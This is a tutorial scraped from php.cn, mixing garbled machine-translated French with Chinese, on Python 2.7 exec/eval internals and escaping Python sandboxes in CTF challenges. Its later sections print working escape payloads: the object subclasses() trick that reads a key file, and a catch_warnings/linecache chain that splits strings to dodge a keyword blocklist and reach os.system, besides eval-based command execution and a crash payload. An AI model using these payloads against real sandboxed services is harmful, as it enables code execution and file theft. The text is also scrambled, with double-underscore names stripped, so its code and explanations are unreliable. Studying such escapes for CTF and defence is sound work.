Analyse des problèmes d'échappement du bac à sable Python

高洛峰
Libérer: 2017-03-15 13:14:12
original
2987 Les gens l'ont consulté

[TOC]
(Basé sur Python 2.7)
Avant de résoudre le problème de l'échappement du bac à sable Python, vous devez comprendre certains détails de la syntaxe en Python. Si vous savez déjà utiliser la fonction eval , vous pouvez sauter la première et la deuxième parties et regarder directement 3x00.

0x00 L'exécution de l'expression

permet d'exécuter le contenu d'une expression, ce qui peut être fait en utilisant exec ou eval.

0x01 exec

exec_stmt:    "exec" expression ["in" expression ["," expression]]
Copier après la connexion

Où, ["in" expression ["," expression]] est une expression facultative.

1, Operate code/String

exec "x = 1+1"
print x
#result:
#2
Copier après la connexion
exec "x = 'a' + '42'"
print x
#result:
#a42
Copier après la connexion

Vous pouvez également exécuter plusieurs lignes de code, entourées de trois guillemets :

a = 0
exec"""for _ in range(input()):
        a += 1
"""
print a
Copier après la connexion

2, opération de fichier

execfichier

D'une part, vous pouvez utiliser execfile, sa fonction est d'exécuter le contenu de ce fichier

#Desktop/pytest.txt
print 'Gou Li Guo Jia Sheng Si Yi'
Copier après la connexion
#Desktop/pytest.py
execfile(r'C:\Users\Think\Desktop\pytest.txt')
Copier après la connexion

est : pytest.py

Gou Li Guo Jia Sheng Si Yi
Copier après la connexion

exécute le contenu dans execfile Notez que pytest.txt exécute . et Non- lit Si le contenu de est pytest.txt, aucune sortie ne sera obtenue. 'Gou Li Guo Jia Sheng Si Yi'Bien sûr, exécuter un fichier .py est également possible. La condition requise pour exécuter le fichier .txt est que le contenu du fichier txt soit ASCII. Il est préférable d'exécuter un fichier .py plutôt qu'un fichier txt.

Ce type d'exécution

copie execfile directement le contenu du fichier pointé par . Par exemple :

#C:/Users/Think/Desktop/Mo.py
#coding:utf-8
a = 2
print '稻花香里说丰年,听取蛤声一片'
Copier après la connexion
#C:/Users/Think/Desktop/pytest.py
a = 3
execfile(r'C:\Users\Think\Desktop\Mo.py')
print a
Copier après la connexion
A ce moment, le résultat de pytest est :

稻花香里说丰年,听取蛤声一片
2
Copier après la connexion
En fait, il s'agit d'exécuter complètement le contenu du fichier ... plutôt que de le traiter comme un appel de fonction à exécuter.

Utilisez exec directement pour opérer

Utilisez exec directement, qui est également le contenu du fichier exécutable, mais vous pouvez utiliser l'expression

pour utiliser la variable Globale in domaine.

#C:\Users\Think\Desktop\test1.txt
print poetry
Copier après la connexion
#pytest.py
result={'poetry':'苟利国家生死以'}
exec open(r'C:\Users\Think\Desktop\test1.txt') in result
Copier après la connexion
3, l'utilisation du tuple

b = 42
tup1 = (123,456,111)
exec "b = tup1[2]"
print b
Copier après la connexion
Le résultat de sortie est

111
Copier après la connexion
Comment utiliser les paramètres globaux/locaux de exec

prend en charge deux paramètres facultatifs et ne prend pas en charge les paramètres spécifiés par mot-clé. execPython adopte la règle de portée
statique (portée lexicale), similaire à C. La variable est disponible dans la fonction et n'est pas disponible en dehors de la fonction. En langage Pascal, la portée dynamique est utilisée, c'est-à-dire que la variable existera une fois la fonction exécutée. Par exemple, une fonction
est imbriquée dans la fonction g Lorsque le programme s'exécute sur f, il recherchera les variables dans l'expression dans f. dans la couche externe. À ce stade, , utilisez cette variable. Si elle n'existe pas, continuez la recherche vers l'extérieur couche par couche. fIl convient de noter que g
est une déclaration grammaticale, pas une fonction, et est une fonction exec. execfileLa raison est la suivante : Imprimer les variables externes directement dans
:
exec

b = 42
tup1 = (123,456,111)
exec "print tup1[1]"
#结果为 456
Copier après la connexion

Imprimer les variables externes dans une fonction :

b = 42
tup1 = (123,456,111)
def pr():
    print tup[1]

pr()

#结果:
#NameError: global name 'tup' is not defined
Copier après la connexion

Règle LEGB

Le paramètre globals dans exec

exec_stmt:    "exec" expression ["in" expression ["," expression]]
Copier après la connexion
est le

globalsobjetdict, qui Les variables globales requises dans sont spécifiées. exec

  • est équivalent à

    globlasglobals()

  • est équivalent à la valeur du paramètre

    locals globals

  • 1,globals

Dans le segment de code, la valeur dans
#coding:utf-8
k = {'b':42}
exec ("a = b + 1",k)
print k['a'],k['b']
#结果:
#43 42
Copier après la connexion
est

, qui provient du exec spécifié, c'est-à-dire locals.kEt, globalsles globales sont extraites des variables globales et agissent sur les variables globales
. 2, locaux

Comparaison :
g = {'b':100}
exec("""age = b + a
print age
     """,g,{'a':1})
#结果:
#101
Copier après la connexion

Vous pouvez voir que par rapport à
g = {'b':100,'a':2}
exec("""age = b + a
print age
     """,g,{'a':1})

#结果:
#101
Copier après la connexion
, il a trois variables internes, à savoir l'âge, b, a

Après formulation, b vient de g (global), et a vient de la variable locale personnalisée. execOn voit que
local est extrait de la variable locale et agit sur la variable locale
. Afin de vérifier cette conclusion, modifiez légèrement :

Comme vous pouvez le constater,
g = {'b':100}
exec("""age = b + a
print age
     """,g,{'a':1})

print g['a']
#结果:
#101
# print g['a']
#KeyError: 'a'
Copier après la connexion
n'affecte pas le dictionnaire

(global), et comme mentionné dans la première section ci-dessus Dans a, la valeur clé g a été renseignée dans le dictionnaire global globals.agexec utilise la conclusion

pour faire la

conclusion

suivante : Nous divisons le contenu après en trois parties : p1, p2, p3
exec

exec ("""p1""",p2,p3)
Copier après la connexion
    La première partie
  1. , le contenu est : Contenu d'exécution <; 🎜>
  2. 第二部分p2,其中的内容来自全局变量,会在上一个变量作用域当中寻找对应的值,并将其传递给表达式,如果不存在p3p1中的结果会传回全局变量;

  3. 第三部分p3,其中的内容是局部的,将用户在其中自设的局部值传递给p1,并且在局部中生效,如果在外部引用此处用到的值将会报错。

exec 反汇编

#use `exec` source code
import dis
def exec_diss():
    exec "x=3"

dis.dis(exec_diss)
Copier après la connexion
# use `exec` disassembly
 4           0 LOAD_CONST               1 (&#39;x=3&#39;)
              3 LOAD_CONST               0 (None)
              6 DUP_TOP             
              7 EXEC_STMT           
              8 LOAD_CONST               0 (None)
             11 RETURN_VALUE
Copier après la connexion
#not use `exec` scource code
import dis
def exec_diss():
    x=3

dis.dis(exec_diss)
Copier après la connexion
#not use exec disassembly
 3           0 LOAD_CONST               1 (3)
              3 STORE_FAST               0 (x)
              6 LOAD_CONST               0 (None)
              9 RETURN_VALUE
Copier après la connexion

指令解释在这里:http://www.php.cn/
简要说明下,TOStop-of-stack,就是栈顶。
LOAD_CONST是入栈,RETURN_VALUE 是还原esp
其中两者的不同之处在于:

# use `exec` disassembly
6 DUP_TOP             #复制栈顶指针
7 EXEC_STMT     #执行 `exec TOS2,TOS1,TOS`,不存在的填充 `none`
Copier après la connexion

也就是说,def函数是将变量入栈,然后调用时就出栈返回;而使用了exec之后,除了正常的入栈流程外,程序还会将栈顶指针复制一遍,然后开始执行exec的内容。

0x02 eval

eval用以动态执行其后的代码,并返回执行后得到的值。

eval(expression[, globals[, locals]])
Copier après la connexion

eval也有两个可选参数,即 globalslocals
使用如下:

print eval("1+1")
#result:
#2
Copier après la connexion

eval 的 globals / locals 参数的使用方法

1,globals
类似于 exec:

g = {&#39;a&#39;:1}
print eval("a+1",g)

#result:
#2
Copier après la connexion

2,locals

k = {&#39;b&#39;:42}
print eval ("b+c",k,{&#39;c&#39;:2})
#result:
#44
Copier après la connexion

eval反汇编

#use_eval
import dis
def eval_dis():
    eval ("x = 3")

dis.dis(eval_dis)
Copier après la connexion
#use_eval_disassembly
 3           0 LOAD_GLOBAL              0 (eval)
              3 LOAD_CONST               1 (&#39;x = 3&#39;)
              6 CALL_FUNCTION            1
              9 POP_TOP             
             10 LOAD_CONST               0 (None)
             13 RETURN_VALUE
Copier après la connexion

比较:

#not_use_eval
import dis
def no_eval_dis():
    x = 3

dis.dis(no_eval_dis)
Copier après la connexion
#not_use_eval_disassembly
 3           0 LOAD_CONST               1 (3)
              3 STORE_FAST               0 (x)
              6 LOAD_CONST               0 (None)
              9 RETURN_VALUE
Copier après la connexion

同样是建栈之后执行。

1x00 exec 和 eval 的区别

exec无返回值:

exec ("print 1+1")
#result:
#2
Copier après la connexion

如果改成

print exec("1+1")
Copier après la connexion

这就会因为没有返回值(不存在该变量而报错)。
eval 是有返回值的:

eval ("print 1+1")
#result:
#SyntaxError: invalid syntax
Copier après la connexion

如果想要打印,则必须在 eval之前使用print
但是奇怪的是,为什么 exec 反汇编出的内容当中,也会有一个RETURN_VALUE 呢?

1x01确定RETURN_VALUE来源

为了确定这个RETURN_VALUE究竟是受到哪一部分的影响,可以改动一下之前的代码,

import dis
def exec_diss():
    exec "x=3"
    return 0

dis.dis(exec_diss)
Copier après la connexion
3           0 LOAD_CONST               1 (&#39;x=3&#39;)
              3 LOAD_CONST               0 (None)
              6 DUP_TOP             
              7 EXEC_STMT           

  4           8 LOAD_CONST               2 (0)
             11 RETURN_VALUE
Copier après la connexion

对比eval的:

import dis
def eval_diss():
    eval ("3")
    return 0

dis.dis(eval_diss)
Copier après la connexion
  3           0 LOAD_GLOBAL              0 (eval)
              3 LOAD_CONST               1 (&#39;3&#39;)
              6 CALL_FUNCTION            1
              9 POP_TOP             

  4          10 LOAD_CONST               2 (0)
             13 RETURN_VALUE
Copier après la connexion

对比 evalexec之后,会发现exec使用的是DUP_TOP(),而eval使用的是POP_TOP,前者是复制 TOS,后者是推出TOS
在 C++ 反汇编当中,会发现对函数调用的最后会有 POP ebp,这是函数执行完之后的特征。在 Python 中,eval就是一种函数,exec是表达式。这也解释了之前说的eval有返回值而exec无返回值的原因。
而最后的 RETURN_VALUE,很明显可以看出并非evalexec的影响,而是 Python 中每一个程序执行完之后的正常返回(如同 C++ 中的 return 0)。
可以写段不包含这两者的代码来验证:

import dis
def no():
    a = 1+1

dis.dis(no)
Copier après la connexion
  3           0 LOAD_CONST               2 (2)
              3 STORE_FAST               0 (a)
              6 LOAD_CONST               0 (None)
              9 RETURN_VALUE
Copier après la connexion

所以,RETURN_VALUE是每个程序正常运行时就有的。

2x00 eval 的危险性

2x01 先期知识

在 Python 当中, import可以将一个 Python 内置模块导入,import可以接受字符串作为参数。
调用 os.system(),就可以执行系统命令。在 Windows下,可以这么写:

>>> import(&#39;os&#39;).system(&#39;dir&#39;)
Copier après la connexion

或者:

>>> import os
>>> os.system(&#39;dir&#39;)
Copier après la connexion

也可以达到这个目的。
这两种方法会使得系统执行dir,即文件列出命令,列出文件后,读取其中某个文件的内容,可以:

with open(&#39;example.txt&#39;) as f:
    s = f.read().replace(&#39;\n&#39;, &#39;&#39;)

print s
Copier après la connexion

如果有一个功能,设计为执行用户所输入的内容,如

print eval("input()")
Copier après la connexion

此时用户输入1+1,那么会得到返回值 2。若前述的

os.system(&#39;dir&#39;)
Copier après la connexion

则会直接列出用户目录。
但是,从之前学过的可以看到,如果为eval指定一个空的全局变量,那么eval就无法从外部得到 os.system模块,这会导致报错。
然而,可以自己导入这个模块嘛。

import(&#39;os&#39;).system(&#39;dir&#39;)
Copier après la connexion

这样就可以继续显示文件了。
如果要避免这一招,可以限定使用指定的内建函数builtins,这将会使得在第一个表达式当中只能采用该模块中的内建函数名称才是合法的,包括:

>>> dir(&#39;builtins&#39;)
[&#39;add&#39;, &#39;class&#39;, &#39;contains&#39;, &#39;delattr&#39;, &#39;doc&#39;, &#39;eq&#39;, &#39;format&#39;, &#39;ge&#39;, &#39;getattribute&#39;, &#39;getitem&#39;, &#39;getnewargs&#39;, &#39;getslice&#39;, &#39;gt&#39;, &#39;hash&#39;, &#39;init&#39;, &#39;le&#39;, &#39;len&#39;, &#39;lt&#39;, &#39;mod&#39;, &#39;mul&#39;, &#39;ne&#39;, &#39;new&#39;, &#39;reduce&#39;, &#39;reduce_ex&#39;, &#39;repr&#39;, &#39;rmod&#39;, &#39;rmul&#39;, &#39;setattr&#39;, &#39;sizeof&#39;, &#39;str&#39;, &#39;subclasshook&#39;, &#39;_formatter_field_name_split&#39;, &#39;_formatter_parser&#39;, &#39;capitalize&#39;, &#39;center&#39;, &#39;count&#39;, &#39;decode&#39;, &#39;encode&#39;, &#39;endswith&#39;, &#39;expandtabs&#39;, &#39;find&#39;, &#39;format&#39;, &#39;index&#39;, &#39;isalnum&#39;, &#39;isalpha&#39;, &#39;isdigit&#39;, &#39;islower&#39;, &#39;isspace&#39;, &#39;istitle&#39;, &#39;isupper&#39;, &#39;join&#39;, &#39;ljust&#39;, &#39;lower&#39;, &#39;lstrip&#39;, &#39;partition&#39;, &#39;replace&#39;, &#39;rfind&#39;, &#39;rindex&#39;, &#39;rjust&#39;, &#39;rpartition&#39;, &#39;rsplit&#39;, &#39;rstrip&#39;, &#39;split&#39;, &#39;splitlines&#39;, &#39;startswith&#39;, &#39;strip&#39;, &#39;swapcase&#39;, &#39;title&#39;, &#39;translate&#39;, &#39;upper&#39;, &#39;zfill&#39;]
Copier après la connexion

这样,就可以写成:

eval("input()",{&#39;builtins&#39;:{}})
Copier après la connexion

就可以限制其只能使用内置的函数。
同时也可以将内置模块置为None,如:

env = {}
env["locals"]   = None
env["globals"]  = None
eval("input()", env)
Copier après la connexion

但是这种情况下builtionsbuitin的引用依然有效。

s = """
(lambda fc=(
    lambda n: [
        c for c in 
            ().class.bases[0].subclasses() 
            if c.name == n
        ][0]
    ):
    fc("function")(
        fc("code")(
            0,0,0,0,"KABOOM",(),(),(),"","",0,""
        ),{}
    )()
)()
"""
eval(s, {&#39;builtins&#39;:{}})
Copier après la connexion

(来自:http://www.php.cn/)
为了创建一个<a href="http://www.php.cn/wiki/60.html" target="_blank">object</a>,要通过

().class.bases[0]
Copier après la connexion

bases类当中的第一个 元素就是元组(tuple),而tuple就是一个object.

lambda这一段主要是构造出一个函数,这个函数要跑完 subclasses来寻找一个object
这是一种情形。总的来说,就是跑一个通过object假的bytecodes.

从上述情况来看,eval是不安全的。

3x00 Python 沙箱逃逸

3x01 第一题

这是一道 CTF 题目,只给了这个:

def make_secure():
    UNSAFE = [&#39;open&#39;,
              &#39;file&#39;,
              &#39;execfile&#39;,
              &#39;compile&#39;,
              &#39;reload&#39;,
              &#39;import&#39;,
              &#39;eval&#39;,
              &#39;input&#39;]
    for func in UNSAFE:
        del builtins.dict[func]

from re import findall
# Remove dangerous builtins
make_secure()
print &#39;Go Ahead, Expoit me >;D&#39;

while True:
    try:
        # Read user input until the first whitespace character
        inp = findall(&#39;\S+&#39;, raw_input())[0]
        a = None
        # Set a to the result from executing the user input
        exec &#39;a=&#39; + inp
        print &#39;Return Value:&#39;, a
    except Exception, e:
    print &#39;Exception:&#39;, e
Copier après la connexion

make_secure这个模块很好理解,看看下边的:

from re import findall
Copier après la connexion

这是 Python 正则表达式的模块。而re.findall可以寻找指定的字符串。
把这一部分单独抽离出来尝试一下:

from re import findall

inp = findall(&#39;\S+&#39;,raw_input())[0]
a = None
exec &#39;a = &#39; +inp
print &#39;Return Value:&#39;,a
Copier après la connexion

运行后输入 1+1,返回结果为2.
构造
之前已经说过可以利用

().class.bases[0].subclasses()
Copier après la connexion

在该题中,主办方搞了个在服务器上的文件,里边有 key,而[40] 是文件,直接就可以了。

().class.bases[0].subclasses()[40]("./key").read()
Copier après la connexion

第二题

#!/usr/bin/env python 
from future import print_function
 
print("Welcome to my Python sandbox! Enter commands below!")
 
banned = [  
    "import",
    "exec",
    "eval",
    "pickle",
    "os",
    "subprocess",
    "kevin sucks",
    "input",
    "banned",
    "cry sum more",
    "sys"
]
 
targets = builtins.dict.keys()  
targets.remove(&#39;raw_input&#39;)  
targets.remove(&#39;print&#39;)  
for x in targets:  
    del builtins.dict[x]
 
while 1:  
    print(">>>", end=&#39; &#39;)
    data = raw_input()
 
    for no in banned:
        if no.lower() in data.lower():
            print("No bueno")
            break
    else: # this means nobreak
        exec data
Copier après la connexion
[x for x in [].class.base.subclasses() if x.name == &#39;catch_warnings&#39;][0].init.func_globals[&#39;linecache&#39;].dict[&#39;o&#39;+&#39;s&#39;].dict[&#39;sy&#39;+&#39;stem&#39;](&#39;echo Hello SandBox&#39;)
Copier après la connexion

4x00 blue-lotus MISC - pyjail Writeup

给了这个:

#!/usr/bin/env python
# coding: utf-8

def del_unsafe():
    UNSAFE_BUILTINS = [&#39;open&#39;,
    &#39;file&#39;,
    &#39;execfile&#39;,
    &#39;compile&#39;,
    &#39;reload&#39;,
    &#39;import&#39;,
    &#39;eval&#39;,
    &#39;input&#39;] ## block objet?
    for func in UNSAFE_BUILTINS:
        del builtins.dict[func]

from re import findall
del_unsafe()

print &#39;Give me your command!&#39;
while True:
    try:
        inp = findall(&#39;\S+&#39;, raw_input())[0]
        print "inp=", inp
        a = None
        exec &#39;a=&#39; + inp
        print &#39;Return Value:&#39;, a
    except Exception, e:
        print &#39;Exception:&#39;, e
Copier après la connexion

比较一下和上边的第一题有什么不同,答案是……并没有什么不同……

Ce qui précède est le contenu détaillé de. pour plus d'informations, suivez d'autres articles connexes sur le site Web de PHP en chinois!

Étiquettes associées:
source:php.cn
Déclaration de ce site Web
Le contenu de cet article est volontairement contribué par les internautes et les droits d'auteur appartiennent à l'auteur original. Ce site n'assume aucune responsabilité légale correspondante. Si vous trouvez un contenu suspecté de plagiat ou de contrefaçon, veuillez contacter admin@php.cn
Tutoriels populaires
Plus>
Derniers téléchargements
Plus>
effets Web
Code source du site Web
Matériel du site Web
Modèle frontal
À propos de nous Clause de non-responsabilité Sitemap
Site Web PHP chinois:Formation PHP en ligne sur le bien-être public,Aidez les apprenants PHP à grandir rapidement!